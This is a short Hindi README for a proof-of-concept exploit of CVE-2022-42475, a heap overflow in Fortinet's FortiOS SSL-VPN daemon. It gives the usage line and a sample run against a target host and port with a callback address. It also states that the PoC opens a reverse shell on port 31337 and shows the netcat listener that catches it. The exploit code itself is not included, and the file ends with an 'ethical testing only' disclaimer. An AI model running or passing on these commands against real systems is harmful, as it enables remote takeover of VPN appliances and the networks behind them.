
FortiOS बफर ओवरफ्लो भेद्यता
https://nvd.nist.gov/vuln/detail/CVE-2022-42475 Fortinet के SSLVPN डेमॉन में हीप ओवरफ़्लो का शोषण करने के लिए POC कोड
यह एक जल्दबाजी और गंदा POC है जो शायद कहीं भी काम नहीं करेगा जब तक कि आप बेहद भाग्यशाली न हों। यह संस्करण पर निर्भर है और इसमें कुछ हार्डकोडेड ऑफसेट्स हैं जो संभवतः एक सिस्टम से दूसरे में बदल जाएंगे।
python3 cve-2022-42475.py rhost rport lhost 'command'
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
POC 31337 पोर्ट पर रिवर्स शेल सेट करने के लिए एक पायथन कमांड का उपयोग करता है
nc -lvnp 31337
यह प्रोजेक्ट केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए इस टूल का उपयोग अवैध है। डेवलपर्स कोई दायित्व नहीं लेते हैं और इस टूल के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
धन्यवाद Alain M को - ट्विटर : @plopz0r